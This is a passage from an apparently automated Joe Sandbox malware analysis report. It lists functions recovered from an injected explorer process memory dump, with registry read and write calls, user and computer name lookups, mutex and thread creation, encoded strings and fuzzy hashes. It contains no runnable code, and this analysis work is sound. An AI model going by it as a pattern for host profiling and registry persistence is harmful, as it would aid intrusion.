Part of subcall function 02EE61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 02EE760D

RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 02EFF142
RegCloseKey.KERNELBASE(80000002), ref: 02EFF158
GetUserNameA.ADVAPI32(?,80000002), ref: 02EFF1E2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02EFF26D

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000001), ref: 02EE651A

Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F
Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000002), ref: 02EE6668

Strings

fWU1, xrefs: 02EFF4E5
3X21, xrefs: 02EFF343
g2g1, xrefs: 02EFF2DD
System, xrefs: 02EFF138
g3Q1, xrefs: 02EFF457
3mo1, xrefs: 02EFF429
3XM1, xrefs: 02EFF3FB
V, xrefs: 02F004C7
inQ1, xrefs: 02EFF4BD
hj4=, xrefs: 02F0038F, 02F004AD
153632, xrefs: 02EFF475
SS8rDn==, xrefs: 02EFF4A0
246122658369, xrefs: 02EFF0AB, 02EFF4D7
iW81, xrefs: 02EFF39F
hGQ1, xrefs: 02EFF3CD
gH21, xrefs: 02EFF315
h2U1, xrefs: 02EFF483
4G41, xrefs: 02EFF371

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
String ID: 153632$246122658369$3X21$3XM1$3mo1$4G41$SS8rDn==$System$V$fWU1$g2g1$g3Q1$gH21$h2U1$hGQ1$hj4=$iW81$inQ1
API String ID: 4106312383-3634076616
Opcode ID: 3fb7970e74e580518aed49cdb3586a0cedc0d6e5d5e89cf3293dcf617c5bd76e
Instruction ID: 36af4baf8f662e92a306489e9ec504ffd2c81b95dfe338ebaa8a2ddc4e088111
Opcode Fuzzy Hash: 3fb7970e74e580518aed49cdb3586a0cedc0d6e5d5e89cf3293dcf617c5bd76e
Instruction Fuzzy Hash: A6D243719011588BEB29DB28CD88B9DBB76AF82348F5081DCD20DA72D6DB758FC09F51

Function 02F1E430 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 330
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 02F1E4ED
_free.LIBCMT ref: 02F1E6B9
_free.LIBCMT ref: 02F1E731
GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743

Strings

Eastern Summer Time, xrefs: 02F1E7F0
Eastern Standard Time, xrefs: 02F1E7DC

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 597776487-239921721
Opcode ID: 1f0d590832dbd3474e92e68c0acd904bf08636459f31871aa744227988efa42c
Instruction ID: 41b5f48786d6209e601cda8117d55db39c50ac2bc739396ca9314e13c840e367
Opcode Fuzzy Hash: 1f0d590832dbd3474e92e68c0acd904bf08636459f31871aa744227988efa42c
Instruction Fuzzy Hash: C0A14F76D00215ABDB24BF65CC45A6EBBBAEF047D4F904469EF01E7280E7719940DF90

Function 02F1021C Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02F1014E), ref: 02F1023E
GetFileInformationByHandle.KERNELBASE(?,?), ref: 02F10298
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02F1014E,?,000000FF,00000000,00000000), ref: 02F10326
__dosmaperr.LIBCMT ref: 02F1032D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02F1036A

Part of subcall function 02F10592: __dosmaperr.LIBCMT ref: 02F105C7

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: f838cb9011a81258b8182f36a0d6b413db1d946b07a0bba44575a893e16c110e
Instruction ID: db03a91e6ea7d4cef237bfac1a354c612e405a3abcd55f48858ed857c9dd180d
Opcode Fuzzy Hash: f838cb9011a81258b8182f36a0d6b413db1d946b07a0bba44575a893e16c110e
Instruction Fuzzy Hash: 65414F75904748AFDB24EFA5DC449AFBBF9EF89380B40452EEA56D3610EB309584CB20

Function 02EEC6D0 Relevance: 6.0, APIs: 4, Instructions: 39
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 02EEC6D3
CreateMutexA.KERNELBASE(00000000,00000000,02F46494), ref: 02EEC6F1
GetLastError.KERNEL32 ref: 02EEC6F9
GetLastError.KERNEL32 ref: 02EEC70A

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID:
API String ID: 3645482037-0
Opcode ID: 96e336ec09b53c17ea0d2c0f0df12f98524c66c5a5df8235003b5d1461d76438
Instruction ID: 029e8eb045134bdeca4dfecda98c3976890cb83b76aa8160be0370fba92b2ac4
Opcode Fuzzy Hash: 96e336ec09b53c17ea0d2c0f0df12f98524c66c5a5df8235003b5d1461d76438
Instruction Fuzzy Hash: C8E012749C4304DFEA542764A98DB19B667E790B95F705816E60EC6494CFB048948721

Function 02F00AA0 Relevance: 6.0, APIs: 4, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EEC6D0: Sleep.KERNELBASE(00000064), ref: 02EEC6D3
Part of subcall function 02EEC6D0: CreateMutexA.KERNELBASE(00000000,00000000,02F46494), ref: 02EEC6F1
Part of subcall function 02EEC6D0: GetLastError.KERNEL32 ref: 02EEC6F9
Part of subcall function 02EEC6D0: GetLastError.KERNEL32 ref: 02EEC70A

Part of subcall function 02EFF060: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 02EFF142
Part of subcall function 02EFF060: RegCloseKey.KERNELBASE(80000002), ref: 02EFF158

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD
Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894

CreateThread.KERNELBASE(00000000,00000000,Function_000208A0,00000000,00000000,00000000), ref: 02F00A66
CreateThread.KERNELBASE(00000000,00000000,Function_00020930,00000000,00000000,00000000), ref: 02F00A77
CreateThread.KERNELBASE(00000000,00000000,Function_000209C0,00000000,00000000,00000000), ref: 02F00A88
Sleep.KERNELBASE(00007530), ref: 02F00A95

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
String ID:
API String ID: 2192108483-0
Opcode ID: ef064f2fb263b022bce3684cc80216ab51e39df505282d5db3a1acecae4f05af
Instruction ID: 7ea2a9344f7a994668d544c992ace8515a9c2c7b754687d6d928d15c50c9183d
Opcode Fuzzy Hash: ef064f2fb263b022bce3684cc80216ab51e39df505282d5db3a1acecae4f05af
Instruction Fuzzy Hash: 50F0E572FD4728B6FAB032A54C83F496A465B14FD1F30601AB71E7E1C05DC07500AAEE

Function 02F1E82B Relevance: 4.6, APIs: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 02F1E8FB

Part of subcall function 02F1E6D1: _free.LIBCMT ref: 02F1E731
Part of subcall function 02F1E6D1: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: a4f7480fc427fc161b2c3532700340493e0b032f432a9122bbd07989e556855c
Instruction ID: 824674111dd0ce083e45a5a4808035303299f77a69400b511f15c7ed6ae0aad3
Opcode Fuzzy Hash: a4f7480fc427fc161b2c3532700340493e0b032f432a9122bbd07989e556855c
Instruction Fuzzy Hash: 50212972D0032997D724BB749C44DABB7BD9B803F4F900665DF25A3181EB709D448EA0

Function 02F100B4 Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68372a3d80545e1a8c74b76f147445bc6b5bed6a760452152af82ec65d41b3b
Instruction ID: 8bb58e7ed5048cdf523fc578d2384c886fe23cbe455ce5389f31a70216f828d5
Opcode Fuzzy Hash: c68372a3d80545e1a8c74b76f147445bc6b5bed6a760452152af82ec65d41b3b
Instruction Fuzzy Hash: 09218632900208BAFB116B689C81BAE772AAF417F8F604319FF247B1D0DF745A459E61

Function 02F163A2 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 02F163EE
GetFileType.KERNELBASE(00000000), ref: 02F16400

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: fe8ed1b836e1901a26e0ab8dd2d343d1ced9200a889db0e3631984c0de9f811b
Instruction ID: 8a34630b21a13bfc1db518f2df0bbac1d3d3c558bafc8a29d27d91e016aff27d
Opcode Fuzzy Hash: fe8ed1b836e1901a26e0ab8dd2d343d1ced9200a889db0e3631984c0de9f811b
Instruction Fuzzy Hash: 09112932A047114EDB304A3E8DD9622BA9CAB522F8F68071EE7B6C22F5C730D486D211

Function 02F1038C Relevance: 3.1, APIs: 2, Instructions: 54
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,02F102C3,?,?,00000000,00000000), ref: 02F103BA
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,02F102C3,?,?,00000000,00000000), ref: 02F103CE

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 0cb6ff4537f9c17a91baa6eb405a24f38f6107e13bfa773df1e894bc874039a2
Instruction ID: ef19bcf4bddf682dfc144718922004c17172d9c6bb01554b2cc0a13438edceaf
Opcode Fuzzy Hash: 0cb6ff4537f9c17a91baa6eb405a24f38f6107e13bfa773df1e894bc874039a2
Instruction Fuzzy Hash: 1011F172D0010CEBDB10DED4C985EDFB7BDAF08354F50466AEA16E6180EB74E685CBA1

Function 02EEB250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000002,?,?,F48E75C7,76F90F00), ref: 02EEB2A6

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 6084da35c142cd3d8cd9b75eb731e64cb3a361bd76711c721d2eb8a7c86a2aee
Instruction ID: 9a8f85658939b5a44bcf7fe44c55a421cf2b8f1d33bdda098b2819ef422681dc
Opcode Fuzzy Hash: 6084da35c142cd3d8cd9b75eb731e64cb3a361bd76711c721d2eb8a7c86a2aee
Instruction Fuzzy Hash: 2551B1719412299BCB20DF64DCC87DDB7B5FF58314F5042D9D81AA7290EB74AA80CF90

Function 02F19B8F Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F1A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02F169C2,00000001,00000364,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84), ref: 02F1A25B

_free.LIBCMT ref: 02F19BFE

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
Instruction ID: 23aa8db8a51d01ea6524215ee955108d8cf949a30b91e15444e86b953ca99a1c
Opcode Fuzzy Hash: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
Instruction Fuzzy Hash: 2C016D73A003166BC321CF68C880D89FB98FB043F0F540669E655B76C0D7B0A911CBE0

Function 02F10042 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F100A9

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
Instruction ID: 6fcfb7362039bf43b8eb1a1b0bddeb86abff22929259213f238bee52a874be61
Opcode Fuzzy Hash: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
Instruction Fuzzy Hash: 2A01AC72D04218AEDF11AFA4DC017DD7FF59B04350F54416AEE18E11D1EF718680DB91

Function 02F1A21A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02F169C2,00000001,00000364,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84), ref: 02F1A25B

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8004cc1359b03e840734dba0efcf552bc7e5220a608742021419b6e742f6b495
Instruction ID: 3216b3a491c573c1acb9e6a595687818f59af31f6c38933a9a3db9f603aa46d1
Opcode Fuzzy Hash: 8004cc1359b03e840734dba0efcf552bc7e5220a608742021419b6e742f6b495
Instruction Fuzzy Hash: 6EF0E932A4756467DB295A21AC04B6A7789AF837F0FA44121BE4896180DF72D900CBE0

Function 02F17E35 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,02F008E7,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F17E67

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 10b3408fac8d2f52ca099c5513972a257c82165e596b2f8ea3ce4593385b0e85
Instruction ID: d9422c57ac026d5a1cff51b57cb388d77efbc7b81c1382e70d11b8141749032b
Opcode Fuzzy Hash: 10b3408fac8d2f52ca099c5513972a257c82165e596b2f8ea3ce4593385b0e85
Instruction Fuzzy Hash: 8CE0E532A0011467E6203A72DC00B5BFACA9B817F0F840122EE099E080CF61CD408BE4

Function 02F008A0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

Sleep.KERNEL32 ref: 02F00925

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: d8bc43537ea591d2a103fd246b31747932d8aa1d34e1db48e5f3f18fd8f510b9
Instruction ID: a6e351e37f19e840befae6af242edcf9664948ca35d751b8f7a50ecb0a411e73
Opcode Fuzzy Hash: d8bc43537ea591d2a103fd246b31747932d8aa1d34e1db48e5f3f18fd8f510b9
Instruction Fuzzy Hash: 52F0F471E40244ABCB01BB6CCD12B0DBBBAEB12BA0F84035DE922672D1DAB159144BD2

Function 02F009C0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

Sleep.KERNEL32 ref: 02F00A45

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: d4401088b108ebeaee4a1cf9009c3ace6e7ca10217412b4374df03c737b2bf0d
Instruction ID: bf6b176095f6e40f2df7bd12336e7c8bf7c6e9746d37d823457323c8ecec343f
Opcode Fuzzy Hash: d4401088b108ebeaee4a1cf9009c3ace6e7ca10217412b4374df03c737b2bf0d
Instruction Fuzzy Hash: 3EF0F971E40644A7DB017B6CCD12B0DBBB9EB22BA0F80035CE912272D1DB7159144BD2

Function 02F00930 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

